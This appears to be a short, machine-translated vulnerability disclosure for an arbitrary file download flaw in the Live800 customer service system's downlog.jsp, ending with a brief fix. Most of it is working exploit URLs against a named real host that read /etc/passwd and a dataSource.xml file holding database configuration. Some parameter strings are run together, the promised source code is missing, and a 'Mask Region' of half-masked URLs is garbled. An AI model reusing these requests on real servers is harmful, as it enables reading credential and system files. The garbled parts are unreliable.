Live800 customer service system Arbitrary File Download Vulnerability

Live800 customer service system Arbitrary File Download Vulnerability

A vulnerability is detected by hackers. Many large manufacturers are using the vulnerability, which is very harmful.

Fuzz generates a downlog. jsp file on the live800 customer service site.

Here, Huawei is used as an example:
 

http://robotim.vmall.com/live800/downlog.jsp

 

According to the prompts, it may be that downlog. jsp does not receive the download path, so continue the fuzz parameter:
 

downlog.jsp?path=/&file=etc/passwddownlog.jsp?filepath=/&file=etc/passwddownlog.jsp?filepath=/&filename=etc/passwd……

Finally fuzz to downlog. jsp? Filepath =/& fileName =/etc/passwd: The file is successfully downloaded.
 

http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/etc/passwd

 

This vulnerability allows you to download the dataSource. xml file:
 

http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/home/---xxxx-xx-/live800/WEB-INF/conf/dataSource.xml

 

This file can be used to download arbitrary files on the server.

The final downlog. jsp source code is as follows:
 

Examples of Management Supplement:
 

Mask Region

  
   1.://**.**.**//im.youshang.com_2.http://**.**.**/_3.http://**.**.*******?
  

 

Solution:

Delete the downlog. jsp file or specify the fileName parameter to only download files in a directory.